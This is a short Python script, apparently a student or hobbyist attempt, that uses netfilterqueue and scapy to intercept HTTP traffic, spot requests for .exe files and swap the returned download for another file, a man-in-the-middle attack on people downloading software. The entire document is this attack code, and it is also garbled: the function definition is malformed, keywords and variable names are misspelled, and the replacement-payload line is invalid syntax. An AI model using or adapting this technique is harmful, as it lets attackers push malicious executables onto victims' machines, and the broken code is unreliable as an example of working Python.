#!usr/bin/env python
import netfilterqueue
import scapy.all as scapy

ack_list = []

def process_packet -scapy.IP(packet.get_payload())
          scapy_packet.haslayer(scapy.Raw);
       	  if scapy_packet[scapy.TCP.dport ==80:
       	     print("HTTP Request")
       	     if ".exe" in scapy_packet[scapy.Raw].load
       	  	print("[+] exe Request")
          	ack_list.append(scapy_packet[scapy.TCP].ack)
          	print(scapy_packet.show())	
          eleif scapy_packet[scapy.TCP].sport ==80:
                
             if scapy_packet[scapy.TCP].seq in acl_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("[+} Replacing file")
                scapy_packet [scapy.Raw].load ="target location"  :"loaction wanted.exe" 
                del scapy_packet[scapy.IP].len
                del scapy_packet[scapy.IP].chksum
                del scapy_packet[scapy.TCP].chksum
                packet.set_payload(str(scapy_packet))
                
          packet.accept()
       
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()       
